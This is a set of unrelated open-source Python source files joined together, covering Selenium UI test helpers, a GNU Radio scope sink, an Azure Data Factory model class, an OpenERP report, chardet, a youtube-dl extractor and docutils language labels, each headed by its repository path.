def use_xvfb(self):
from pyvirtualdisplay import Display
self.display = Display('xvfb',
visible=1,
size=(1280, 1024))
self.display.start()
self.driver = WebDriver()
def setUp(self):
try:
self.driver = WebDriver()
ui_is_not_available = False
except WebDriverException:
ui_is_not_available = True
if ui_is_not_available:
self.use_xvfb()
self.driver.implicitly_wait(10)
clear_caches()
setup_for_ui_test()
super(UITestCase, self).setUp()
def tearDown(self):
self.driver.quit()
if hasattr(self, 'display'):
self.display.stop()
ContentType.objects.clear_cache()
super(UITestCase, self).tearDown()
def click(self, selector):
self.find(selector).click()
def click_when_visible(self, selector):
element = self.find(selector)
self.wait_until_visible(element)
element.click()
def find(self, selector):
return self.driver.find_element_by_css_selector(selector)
def find_name(self, name):
return self.driver.find_element_by_name(name)
def find_id(self, id):
return self.driver.find_element_by_id(id)
def process_login_form(self, username, password):
username_elmt = self.wait_until_present('[name="username"]')
password_elmt = self.find_name('password')
username_elmt.send_keys(username)
password_elmt.send_keys(password)
self.click('form * button')
def browse_to_url(self, url):
self.driver.get(self.live_server_url + url)
def browse_to_instance_url(self, url, instance=None):
instance = instance if instance is not None else self.instance
self.driver.get('%s/%s/%s' % (self.live_server_url,
instance.url_name,
url))
def find_anchor_by_url(self, url):
return self.find("[href='%s']" % url)
def wait_until_present(self, selector, timeout=10):
"""
Wait until an element with CSS 'selector' exists on the page.
Useful for detecting that an operation loads the page you're expecting.
"""
element = [None] # use list so it can be set by inner scope
def is_present(driver):
element[0] = self.find(selector)
return element[0] is not None
WebDriverWait(self.driver, timeout).until(is_present)
return element[0]
def wait_until_text_present(self, text, timeout=10):
"""
Wait until 'text' exists on the page.
Useful for detecting that an operation loads the page you're expecting.
"""
WebDriverWait(self.driver, timeout).until(
lambda driver: text in driver.page_source)
def wait_until_enabled(self, element_or_selector, timeout=10):
"""
Wait until 'element_or_selector' is enabled.
"""
element = self._get_element(element_or_selector)
WebDriverWait(self.driver, timeout).until(
lambda driver: element.get_attribute("disabled") is None)
return element
def wait_until_visible(self, element_or_selector, timeout=10):
"""
Wait until 'element_or_selector' (known to already exist on the page)
is displayed.
"""
element = self._get_element(element_or_selector)
WebDriverWait(self.driver, timeout).until(
lambda driver: element.is_displayed())
return element
def wait_until_invisible(self, element_or_selector, timeout=10):
"""
Wait until 'element_or_selector' (known to already exist on the page)
is not displayed.
"""
element = self._get_element(element_or_selector)
def is_invisible(driver):
try:
return not element.is_displayed()
except StaleElementReferenceException:
return True
WebDriverWait(self.driver, timeout).until(is_invisible)
return element
def _get_element(self, element_or_selector):
if isinstance(element_or_selector, basestring):
return self.find(element_or_selector)
else:
return element_or_selector
class TreemapUITestCase(UITestCase):
def assertElementVisibility(self, element, visible):
if isinstance(element, basestring):
element = self.find_id(element)
wait = (self.wait_until_visible if visible
else self.wait_until_invisible)
wait(element)
self.assertEqual(visible, element.is_displayed())
def setUp(self):
# for some reason, the call to this helper
# in setup_databases() on the test runner
# is not executing in this context.
# this is required to make the test work.
create_mock_system_user()
super(TreemapUITestCase, self).setUp()
instance_name = 'autotest_instance'
Instance.objects.filter(name=instance_name).delete()
self.instance = create_instance(
name=instance_name,
is_public=False,
url_name='autotest-instance',
edge_length=20000)
self.user = make_commander_user(instance=self.instance,
username='username')
self.profile = RegistrationProfile.objects.create_profile(self.user)
def login_workflow(self, user=None):
if user is None:
user = self.user
self.browse_to_url('/accounts/logout/')
self.browse_to_url('/accounts/login/')
self.process_login_form(user.username, 'password')
def url_is_user_page(driver):
return driver.current_url.endswith('/users/%s/' % user.username)
WebDriverWait(self.driver, 10).until(url_is_user_page)
def drag_marker_on_map(self, endx, endy):
actions = ActionChains(self.driver)
marker = self.find('.leaflet-marker-pane img')
actions.drag_and_drop_by_offset(marker, endx, endy)
actions.perform()
self._click_add_tree_next_step(0)
def click_point_on_map(self, x, y):
# We're in add tree mode; now we need to click somewhere on the map
map_div = self.find_id('map')
actions = ActionChains(self.driver)
# move to the center of the map
actions.move_to_element(map_div)
# move away from the center
actions.move_by_offset(x, y)
actions.click()
actions.perform()
def click_add_tree(self):
# Enter add tree mode
self.click(".subhead .addBtn")
def _click_add_tree_next_step(self, n):
button = self.driver.find_elements_by_css_selector(
'#sidebar-add-tree .add-step-footer li.next a')[n]
self.wait_until_enabled(button)
button.click()
sleep(1) # wait for animation to show the next step
def start_add_tree(self, x, y):
self.click_add_tree()
self.click_point_on_map(x, y)
self._click_add_tree_next_step(0)
def instance_trees(self):
return Tree.objects.filter(instance=self.instance)
def ntrees(self):
return self.instance_trees().count()
def instance_plots(self):
return Plot.objects.filter(instance=self.instance)
def nplots(self):
return self.instance_plots().count()
def go_to_map_page(self):
self.browse_to_instance_url("map/")
def go_to_feature_detail(self, feature_id, edit=False):
self.browse_to_instance_url("features/%s/%s"
% (feature_id,
"edit" if edit else ""))
def go_to_tree_detail(self, plot_id, tree_id):
self.browse_to_instance_url("features/%s/trees/%s/"
% (plot_id, tree_id))
def add_tree_done(self, whenDone='close'):
# Move to "Finalize" step
self._click_add_tree_next_step(1)
if whenDone == 'copy':
self.click('#addtree-addsame')
elif whenDone == 'new':
self.click('#addtree-addnew')
elif whenDone == 'edit':
self.click('#addtree-viewdetails')
elif whenDone == 'close':
self.click('#addtree-done')
# Click "Done"
self._click_add_tree_next_step(2)
if whenDone == 'close':
# Wait for "browse trees" mode
self.wait_until_visible('#sidebar-browse-trees')
elif whenDone == 'edit':
# Wait for "save" button on "plot detail" page
self.wait_until_visible('#save-edit-plot', 30)
else:
# Wait for "Add Tree" step 1
self.wait_until_visible('#sidebar-add-tree .form-search')
def login_and_go_to_map_page(self):
self.login_workflow()
self.go_to_map_page()
def parse_function_string(module_and_function_string):
"""
Given a string like:
a.b.c.f
Return the function 'f' from module 'a.b.c'
"""
parts = module_and_function_string.split('.')
mod = '.'.join(parts[0:-1])
fn = parts[-1]
return getattr(importlib.import_module(mod), fn)
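# Illustrative example (added; not in the original file): resolving a dotted
# path with a standard-library function.
#
#     parse_function_string('os.path.join') is os.path.join  # -> True
#
# settings.UITEST_CREATE_INSTANCE_FUNCTION is expected to hold such a dotted
# string pointing at the project's instance-factory function.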
def _get_create_instance():
return parse_function_string(
settings.UITEST_CREATE_INSTANCE_FUNCTION)
create_instance = _get_create_instance()
|
jeenalee/servo
|
refs/heads/master
|
tests/wpt/web-platform-tests/tools/pytest/doc/en/example/assertion/test_setup_flow_example.py
|
217
|
def setup_module(module):
module.TestStateFullThing.classcount = 0
class TestStateFullThing:
def setup_class(cls):
cls.classcount += 1
def teardown_class(cls):
cls.classcount -= 1
def setup_method(self, method):
self.id = eval(method.__name__[5:])
def test_42(self):
assert self.classcount == 1
assert self.id == 42
def test_23(self):
assert self.classcount == 1
assert self.id == 23
def teardown_module(module):
assert module.TestStateFullThing.classcount == 0
""" For this example the control flow happens as follows::
import test_setup_flow_example
setup_module(test_setup_flow_example)
setup_class(TestStateFullThing)
instance = TestStateFullThing()
setup_method(instance, instance.test_42)
instance.test_42()
setup_method(instance, instance.test_23)
instance.test_23()
teardown_class(TestStateFullThing)
teardown_module(test_setup_flow_example)
Note that ``setup_class(TestStateFullThing)`` is called and not
``TestStateFullThing.setup_class()`` which would require you
to insert ``setup_class = classmethod(setup_class)`` to make
your setup function callable.
"""
|
SpectreJan/gnuradio
|
refs/heads/master
|
gr-wxgui/python/wxgui/scopesink_gl.py
|
58
|
#
# Copyright 2008,2010,2012 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
##################################################
# Imports
##################################################
import scope_window
import common
from gnuradio import gr, filter
from gnuradio import blocks
from gnuradio import analog
from gnuradio import wxgui
from pubsub import pubsub
from constants import *
import math
class ac_couple_block(gr.hier_block2):
"""
AC couple the incoming stream by subtracting out the low pass signal.
Mute the low pass filter to disable ac coupling.
"""
def __init__(self, controller, ac_couple_key, sample_rate_key):
gr.hier_block2.__init__(
self,
"ac_couple",
gr.io_signature(1, 1, gr.sizeof_float),
gr.io_signature(1, 1, gr.sizeof_float),
)
#blocks
lpf = filter.single_pole_iir_filter_ff(0.0)
sub = blocks.sub_ff()
mute = blocks.mute_ff()
#connect
self.connect(self, sub, self)
self.connect(self, lpf, mute, (sub, 1))
#subscribe
controller.subscribe(ac_couple_key, lambda x: mute.set_mute(not x))
controller.subscribe(sample_rate_key, lambda x: lpf.set_taps(0.05))
#initialize
controller[ac_couple_key] = controller[ac_couple_key]
controller[sample_rate_key] = controller[sample_rate_key]
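# Illustrative signal-flow summary (added; not in the original file) of the
# connect() calls above:
#
#     in ---------------------------> (sub, 0) --> out
#     in --> lpf --> mute ----------> (sub, 1)
#
# With AC coupling enabled, the mute block passes the low-pass estimate of the
# DC level through and sub_ff removes it from the stream; muting that branch
# feeds zeros to (sub, 1), so the stream passes through unchanged.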
##################################################
# Scope sink block (wrapper for old wxgui)
##################################################
class _scope_sink_base(gr.hier_block2, common.wxgui_hb):
"""
A scope block with a gui window.
"""
def __init__(
self,
parent,
title='',
sample_rate=1,
size=scope_window.DEFAULT_WIN_SIZE,
v_scale=0,
t_scale=0,
v_offset=0,
xy_mode=False,
ac_couple=False,
num_inputs=1,
trig_mode=scope_window.DEFAULT_TRIG_MODE,
y_axis_label='Counts',
frame_rate=scope_window.DEFAULT_FRAME_RATE,
use_persistence=False,
persist_alpha=None,
**kwargs #do not end with a comma
):
#ensure analog alpha
if persist_alpha is None:
actual_frame_rate=float(frame_rate)
analog_cutoff_freq=0.5 # Hertz
#calculate alpha from wanted cutoff freq
persist_alpha = 1.0 - math.exp(-2.0*math.pi*analog_cutoff_freq/actual_frame_rate)
if not t_scale: t_scale = 10.0/sample_rate
#init
gr.hier_block2.__init__(
self,
"scope_sink",
gr.io_signature(num_inputs, num_inputs, self._item_size),
gr.io_signature(0, 0, 0),
)
#scope
msgq = gr.msg_queue(2)
scope = wxgui.oscope_sink_f(sample_rate, msgq)
#controller
self.controller = pubsub()
self.controller.subscribe(SAMPLE_RATE_KEY, scope.set_sample_rate)
self.controller.publish(SAMPLE_RATE_KEY, scope.sample_rate)
self.controller.subscribe(DECIMATION_KEY, scope.set_decimation_count)
self.controller.publish(DECIMATION_KEY, scope.get_decimation_count)
self.controller.subscribe(TRIGGER_LEVEL_KEY, scope.set_trigger_level)
self.controller.publish(TRIGGER_LEVEL_KEY, scope.get_trigger_level)
self.controller.subscribe(TRIGGER_MODE_KEY, scope.set_trigger_mode)
self.controller.publish(TRIGGER_MODE_KEY, scope.get_trigger_mode)
self.controller.subscribe(TRIGGER_SLOPE_KEY, scope.set_trigger_slope)
self.controller.publish(TRIGGER_SLOPE_KEY, scope.get_trigger_slope)
self.controller.subscribe(TRIGGER_CHANNEL_KEY, scope.set_trigger_channel)
self.controller.publish(TRIGGER_CHANNEL_KEY, scope.get_trigger_channel)
actual_num_inputs = self._real and num_inputs or num_inputs*2
#init ac couple
for i in range(actual_num_inputs):
self.controller[common.index_key(AC_COUPLE_KEY, i)] = ac_couple
#start input watcher
common.input_watcher(msgq, self.controller, MSG_KEY)
#create window
self.win = scope_window.scope_window(
parent=parent,
controller=self.controller,
size=size,
title=title,
frame_rate=frame_rate,
num_inputs=actual_num_inputs,
sample_rate_key=SAMPLE_RATE_KEY,
t_scale=t_scale,
v_scale=v_scale,
v_offset=v_offset,
xy_mode=xy_mode,
trig_mode=trig_mode,
y_axis_label=y_axis_label,
ac_couple_key=AC_COUPLE_KEY,
trigger_level_key=TRIGGER_LEVEL_KEY,
trigger_mode_key=TRIGGER_MODE_KEY,
trigger_slope_key=TRIGGER_SLOPE_KEY,
trigger_channel_key=TRIGGER_CHANNEL_KEY,
decimation_key=DECIMATION_KEY,
msg_key=MSG_KEY,
use_persistence=use_persistence,
persist_alpha=persist_alpha,
)
common.register_access_methods(self, self.win)
#connect
if self._real:
for i in range(num_inputs):
self.wxgui_connect(
(self, i),
ac_couple_block(self.controller, common.index_key(AC_COUPLE_KEY, i), SAMPLE_RATE_KEY),
(scope, i),
)
else:
for i in range(num_inputs):
c2f = blocks.complex_to_float()
self.wxgui_connect((self, i), c2f)
for j in range(2):
self.connect(
(c2f, j),
ac_couple_block(self.controller, common.index_key(AC_COUPLE_KEY, 2*i+j), SAMPLE_RATE_KEY),
(scope, 2*i+j),
)
class scope_sink_f(_scope_sink_base):
_item_size = gr.sizeof_float
_real = True
class scope_sink_c(_scope_sink_base):
_item_size = gr.sizeof_gr_complex
_real = False
# ----------------------------------------------------------------
# Stand-alone test application
# ----------------------------------------------------------------
import wx
from gnuradio.wxgui import stdgui2
class test_top_block (stdgui2.std_top_block):
def __init__(self, frame, panel, vbox, argv):
stdgui2.std_top_block.__init__ (self, frame, panel, vbox, argv)
default_input_rate = 1e6
if len(argv) > 1:
input_rate = int(argv[1])
else:
input_rate = default_input_rate
if len(argv) > 2:
v_scale = float(argv[2]) # start up at this v_scale value
else:
v_scale = None # start up in autorange mode, default
if len(argv) > 3:
t_scale = float(argv[3]) # start up at this t_scale value
else:
t_scale = .00003*default_input_rate/input_rate # old behavior
print "input rate %s v_scale %s t_scale %s" % (input_rate,v_scale,t_scale)
# Generate a complex sinusoid
ampl=1.0e3
self.src0 = analog.sig_source_c(input_rate, analog.GR_SIN_WAVE,
25.1e3*input_rate/default_input_rate, ampl)
self.noise = analog.sig_source_c(input_rate, analog.GR_SIN_WAVE,
11.1*25.1e3*input_rate/default_input_rate,
ampl/10)
#self.noise = analog.noise_source_c(analog.GR_GAUSSIAN, ampl/10)
self.combine = blocks.add_cc()
# We add this throttle block so that this demo doesn't suck down
# all the CPU available. You normally wouldn't use it...
self.thr = blocks.throttle(gr.sizeof_gr_complex, input_rate)
scope = scope_sink_c(panel,"Secret Data",sample_rate=input_rate,
v_scale=v_scale, t_scale=t_scale)
vbox.Add(scope.win, 1, wx.EXPAND)
# Ultimately this will be
# self.connect("src0 throttle scope")
self.connect(self.src0,(self.combine,0))
self.connect(self.noise,(self.combine,1))
self.connect(self.combine, self.thr, scope)
def main ():
app = stdgui2.stdapp(test_top_block, "O'Scope Test App")
app.MainLoop()
if __name__ == '__main__':
main()
|
lmazuel/azure-sdk-for-python
|
refs/heads/master
|
azure-mgmt-datafactory/azure/mgmt/datafactory/models/cassandra_linked_service.py
|
1
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .linked_service import LinkedService
class CassandraLinkedService(LinkedService):
"""Linked service for Cassandra data source.
:param additional_properties: Unmatched properties from the message are
deserialized to this collection
:type additional_properties: dict[str, object]
:param connect_via: The integration runtime reference.
:type connect_via:
~azure.mgmt.datafactory.models.IntegrationRuntimeReference
:param description: Linked service description.
:type description: str
:param parameters: Parameters for linked service.
:type parameters: dict[str,
~azure.mgmt.datafactory.models.ParameterSpecification]
:param annotations: List of tags that can be used for describing the
Dataset.
:type annotations: list[object]
:param type: Constant filled by server.
:type type: str
:param host: Host name for connection. Type: string (or Expression with
resultType string).
:type host: object
:param authentication_type: AuthenticationType to be used for connection.
Type: string (or Expression with resultType string).
:type authentication_type: object
:param port: The port for the connection. Type: integer (or Expression
with resultType integer).
:type port: object
:param username: Username for authentication. Type: string (or Expression
with resultType string).
:type username: object
:param password: Password for authentication.
:type password: ~azure.mgmt.datafactory.models.SecretBase
:param encrypted_credential: The encrypted credential used for
authentication. Credentials are encrypted using the integration runtime
credential manager. Type: string (or Expression with resultType string).
:type encrypted_credential: object
"""
_validation = {
'type': {'required': True},
'host': {'required': True},
}
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'connect_via': {'key': 'connectVia', 'type': 'IntegrationRuntimeReference'},
'description': {'key': 'description', 'type': 'str'},
'parameters': {'key': 'parameters', 'type': '{ParameterSpecification}'},
'annotations': {'key': 'annotations', 'type': '[object]'},
'type': {'key': 'type', 'type': 'str'},
'host': {'key': 'typeProperties.host', 'type': 'object'},
'authentication_type': {'key': 'typeProperties.authenticationType', 'type': 'object'},
'port': {'key': 'typeProperties.port', 'type': 'object'},
'username': {'key': 'typeProperties.username', 'type': 'object'},
'password': {'key': 'typeProperties.password', 'type': 'SecretBase'},
'encrypted_credential': {'key': 'typeProperties.encryptedCredential', 'type': 'object'},
}
def __init__(self, host, additional_properties=None, connect_via=None, description=None, parameters=None, annotations=None, authentication_type=None, port=None, username=None, password=None, encrypted_credential=None):
super(CassandraLinkedService, self).__init__(additional_properties=additional_properties, connect_via=connect_via, description=description, parameters=parameters, annotations=annotations)
self.host = host
self.authentication_type = authentication_type
self.port = port
self.username = username
self.password = password
self.encrypted_credential = encrypted_credential
self.type = 'Cassandra'
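# Illustrative construction sketch (added; not part of the generated file).
# Only 'host' is required by _validation; the SecureString import below is an
# assumption about the caller's environment, not something this module defines,
# and all values shown are hypothetical.
#
#     from azure.mgmt.datafactory.models import SecureString
#     linked_service = CassandraLinkedService(
#         host='cassandra.internal.example.com',
#         port=9042,
#         authentication_type='Basic',
#         username='reader',
#         password=SecureString(value='hypothetical-password'))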
|
komsas/OpenUpgrade
|
refs/heads/master
|
addons/mrp/report/workcenter_load.py
|
437
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.report.render import render
from openerp.report.interface import report_int
import time
from datetime import date, datetime, timedelta
from dateutil.relativedelta import relativedelta
from openerp.report.misc import choice_colors
import StringIO
from pychart import *
theme.use_color = 1
#
# TODO: Bad code, seems buggy, TO CHECK !
#
class external_pdf(render):
def __init__(self, pdf):
render.__init__(self)
self.pdf = pdf
self.output_type='pdf'
def _render(self):
return self.pdf
class report_custom(report_int):
def _compute_dates(self, time_unit, start, stop):
if not stop:
stop = start
if time_unit == 'month':
dates = {}
a = int(start.split("-")[0])*12 + int(start.split("-")[1])
z = int(stop.split("-")[0])*12 + int(stop.split("-")[1]) + 1
for i in range(a,z):
year = i/12
month = i%12
if month == 0:
year -= 1
month = 12
months = {1:"January",2:"February",3:"March",4:"April",5:"May",6:"June",7:"July",8:"August",9:"September",10:"October",11:"November",12:"December"}
dates[i] = {
'name' :months[month],
'start':(datetime(year, month, 2) + relativedelta(day=1)).strftime('%Y-%m-%d'),
'stop' :(datetime(year, month, 2) + relativedelta(day=31)).strftime('%Y-%m-%d'),
}
return dates
elif time_unit == 'week':
dates = {}
start_week = date(int(start.split("-")[0]),int(start.split("-")[1]),int(start.split("-")[2])).isocalendar()
end_week = date(int(stop.split("-")[0]),int(stop.split("-")[1]),int(stop.split("-")[2])).isocalendar()
a = int(start.split("-")[0])*52 + start_week[1]
z = int(stop.split("-")[0])*52 + end_week[1]
for i in range(a,z+1):
year = i/52
week = i%52
d = date(year, 1, 1)
dates[i] = {
'name' :"Week #%d" % week,
'start':(d + timedelta(days=-d.weekday(), weeks=week)).strftime('%Y-%m-%d'),
'stop' :(d + timedelta(days=6-d.weekday(), weeks=week)).strftime('%Y-%m-%d'),
}
return dates
else: # time_unit = day
dates = {}
a = datetime(int(start.split("-")[0]),int(start.split("-")[1]),int(start.split("-")[2]))
z = datetime(int(stop.split("-")[0]),int(stop.split("-")[1]),int(stop.split("-")[2]))
i = a
while i <= z:
dates[map(int,i.strftime('%Y%m%d').split())[0]] = {
'name' :i.strftime('%Y-%m-%d'),
'start':i.strftime('%Y-%m-%d'),
'stop' :i.strftime('%Y-%m-%d'),
}
i = i + relativedelta(days=+1)
return dates
return {}
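# Illustrative sketch (added; not in the original file) of the buckets
# _compute_dates() builds for a hypothetical monthly report:
#
#     self._compute_dates('month', '2014-01-15', '2014-03-02')
#     # -> {24169: {'name': 'January',  'start': '2014-01-01', 'stop': '2014-01-31'},
#     #     24170: {'name': 'February', 'start': '2014-02-01', 'stop': '2014-02-28'},
#     #     24171: {'name': 'March',    'start': '2014-03-01', 'stop': '2014-03-31'}}
#
# Keys are year*12 + month, which is why create() sorts them before plotting.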
def create(self, cr, uid, ids, datas, context=None):
assert len(ids), 'You should provide some ids!'
colors = choice_colors(len(ids))
cr.execute(
"SELECT MAX(mrp_production.date_planned) AS stop,MIN(mrp_production.date_planned) AS start "\
"FROM mrp_workcenter, mrp_production, mrp_production_workcenter_line "\
"WHERE mrp_production_workcenter_line.production_id=mrp_production.id "\
"AND mrp_production_workcenter_line.workcenter_id=mrp_workcenter.id "\
"AND mrp_production.state NOT IN ('cancel','done') "\
"AND mrp_workcenter.id IN %s",(tuple(ids),))
res = cr.dictfetchone()
if not res['stop']:
res['stop'] = time.strftime('%Y-%m-%d %H:%M:%S')
if not res['start']:
res['start'] = time.strftime('%Y-%m-%d %H:%M:%S')
dates = self._compute_dates(datas['form']['time_unit'], res['start'][:10], res['stop'][:10])
dates_list = dates.keys()
dates_list.sort()
x_index = []
for date in dates_list:
x_index.append((dates[date]['name'], date))
pdf_string = StringIO.StringIO()
can = canvas.init(fname=pdf_string, format='pdf')
can.set_title("Work Center Loads")
chart_object.set_defaults(line_plot.T, line_style=None)
if datas['form']['measure_unit'] == 'cycles':
y_label = "Load (Cycles)"
else:
y_label = "Load (Hours)"
# For add the report header on the top of the report.
tb = text_box.T(loc=(300, 500), text="/hL/15/bWork Center Loads", line_style=None)
tb.draw()
ar = area.T(legend = legend.T(),
x_grid_style = line_style.gray70_dash1,
x_axis = axis.X(label="Periods", format="/a90/hC%s"),
x_coord = category_coord.T(x_index, 0),
y_axis = axis.Y(label=y_label),
y_range = (0, None),
size = (640,480))
bar_plot.fill_styles.reset();
# select workcenters
cr.execute(
"SELECT mw.id, rs.name FROM mrp_workcenter mw, resource_resource rs " \
"WHERE mw.id IN %s and mw.resource_id=rs.id " \
"ORDER BY mw.id" ,(tuple(ids),))
workcenters = cr.dictfetchall()
data = []
for date in dates_list:
vals = []
for workcenter in workcenters:
cr.execute("SELECT SUM(mrp_production_workcenter_line.hour) AS hours, SUM(mrp_production_workcenter_line.cycle) AS cycles, \
resource_resource.name AS name, mrp_workcenter.id AS id \
FROM mrp_production_workcenter_line, mrp_production, mrp_workcenter, resource_resource \
WHERE (mrp_production_workcenter_line.production_id=mrp_production.id) \
AND (mrp_production_workcenter_line.workcenter_id=mrp_workcenter.id) \
AND (mrp_workcenter.resource_id=resource_resource.id) \
AND (mrp_workcenter.id=%s) \
AND (mrp_production.date_planned BETWEEN %s AND %s) \
GROUP BY mrp_production_workcenter_line.workcenter_id, resource_resource.name, mrp_workcenter.id \
ORDER BY mrp_workcenter.id", (workcenter['id'], dates[date]['start'] + ' 00:00:00', dates[date]['stop'] + ' 23:59:59'))
res = cr.dictfetchall()
if not res:
vals.append(0.0)
else:
if datas['form']['measure_unit'] == 'cycles':
vals.append(res[0]['cycles'] or 0.0)
else:
vals.append(res[0]['hours'] or 0.0)
toto = [dates[date]['name']]
for val in vals:
toto.append(val)
data.append(toto)
workcenter_num = 0
for workcenter in workcenters:
f = fill_style.Plain()
f.bgcolor = colors[workcenter_num]
ar.add_plot(bar_plot.T(label=workcenter['name'], data=data, fill_style=f, hcol=workcenter_num+1, cluster=(workcenter_num, len(res))))
workcenter_num += 1
if (not data) or (len(data[0]) <= 1):
ar = self._empty_graph(time.strftime('%Y-%m-%d'))
ar.draw(can)
# close canvas so that the file is written to "disk"
can.close()
self.obj = external_pdf(pdf_string.getvalue())
self.obj.render()
pdf_string.close()
return (self.obj.pdf, 'pdf')
def _empty_graph(self, date):
data = [[date, 0]]
ar = area.T(x_coord = category_coord.T(data, 0), y_range = (0, None),
x_axis = axis.X(label="Periods"),
y_axis = axis.Y(label="Load"))
ar.add_plot(bar_plot.T(data = data, label="No production order"))
return ar
report_custom('report.mrp.workcenter.load')
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
HiroIshikawa/21playground
|
refs/heads/master
|
visualizer/_app_boilerplate/venv/lib/python3.5/site-packages/requests/packages/chardet/mbcharsetprober.py
|
2923
|
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 2001
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
# Shy Shalom - original C code
# Proofpoint, Inc.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
from . import constants
from .charsetprober import CharSetProber
class MultiByteCharSetProber(CharSetProber):
def __init__(self):
CharSetProber.__init__(self)
self._mDistributionAnalyzer = None
self._mCodingSM = None
self._mLastChar = [0, 0]
def reset(self):
CharSetProber.reset(self)
if self._mCodingSM:
self._mCodingSM.reset()
if self._mDistributionAnalyzer:
self._mDistributionAnalyzer.reset()
self._mLastChar = [0, 0]
def get_charset_name(self):
pass
def feed(self, aBuf):
aLen = len(aBuf)
for i in range(0, aLen):
codingState = self._mCodingSM.next_state(aBuf[i])
if codingState == constants.eError:
if constants._debug:
sys.stderr.write(self.get_charset_name()
+ ' prober hit error at byte ' + str(i)
+ '\n')
self._mState = constants.eNotMe
break
elif codingState == constants.eItsMe:
self._mState = constants.eFoundIt
break
elif codingState == constants.eStart:
charLen = self._mCodingSM.get_current_charlen()
if i == 0:
self._mLastChar[1] = aBuf[0]
self._mDistributionAnalyzer.feed(self._mLastChar, charLen)
else:
self._mDistributionAnalyzer.feed(aBuf[i - 1:i + 1],
charLen)
self._mLastChar[0] = aBuf[aLen - 1]
if self.get_state() == constants.eDetecting:
if (self._mDistributionAnalyzer.got_enough_data() and
(self.get_confidence() > constants.SHORTCUT_THRESHOLD)):
self._mState = constants.eFoundIt
return self.get_state()
def get_confidence(self):
return self._mDistributionAnalyzer.get_confidence()
|
Paczesiowa/youtube-dl
|
refs/heads/master
|
youtube_dl/extractor/ruhd.py
|
149
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from .common import InfoExtractor
class RUHDIE(InfoExtractor):
_VALID_URL = r'http://(?:www\.)?ruhd\.ru/play\.php\?vid=(?P<id>\d+)'
_TEST = {
'url': 'http://www.ruhd.ru/play.php?vid=207',
'md5': 'd1a9ec4edf8598e3fbd92bb16072ba83',
'info_dict': {
'id': '207',
'ext': 'divx',
'title': 'КОТ бааааам',
'description': 'классный кот)',
'thumbnail': 're:^http://.*\.jpg$',
}
}
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
video_url = self._html_search_regex(
r'<param name="src" value="([^"]+)"', webpage, 'video url')
title = self._html_search_regex(
r'<title>([^<]+) RUHD.ru - Видео Высокого качества №1 в России!</title>',
webpage, 'title')
description = self._html_search_regex(
r'(?s)<div id="longdesc">(.+?)<span id="showlink">',
webpage, 'description', fatal=False)
thumbnail = self._html_search_regex(
r'<param name="previewImage" value="([^"]+)"',
webpage, 'thumbnail', fatal=False)
if thumbnail:
thumbnail = 'http://www.ruhd.ru' + thumbnail
return {
'id': video_id,
'url': video_url,
'title': title,
'description': description,
'thumbnail': thumbnail,
}
|
mscuthbert/abjad
|
refs/heads/master
|
abjad/tools/pitchtools/test/test_pitchtools_NamedPitch___copy__.py
|
2
|
# -*- encoding: utf-8 -*-
import copy
from abjad import *
def test_pitchtools_NamedPitch___copy___01():
pitch = NamedPitch(13)
new = copy.copy(pitch)
assert new is not pitch
assert new.accidental is not pitch.accidental
|
ajaxsys/dict-admin
|
refs/heads/master
|
docutils/languages/gl.py
|
149
|
# -*- coding: utf-8 -*-
# Author: David Goodger
# Contact: [email protected]
# Revision: $Revision: 2224 $
# Date: $Date: 2004-06-05 21:40:46 +0200 (Sat, 05 Jun 2004) $
# Copyright: This module has been placed in the public domain.
# New language mappings are welcome. Before doing a new translation, please
# read <http://docutils.sf.net/docs/howto/i18n.html>. Two files must be
# translated for each language: one in docutils/languages, the other in
# docutils/parsers/rst/languages.
"""
Galician-language mappings for language-dependent features of Docutils.
"""
__docformat__ = 'reStructuredText'
labels = {
# fixed: language-dependent
'author': u'Autor',
'authors': u'Autores',
'organization': u'Organizaci\u00f3n',
'address': u'Enderezo',
'contact': u'Contacto',
'version': u'Versi\u00f3n',
'revision': u'Revisi\u00f3n',
'status': u'Estado',
'date': u'Data',
'copyright': u'Dereitos de copia',
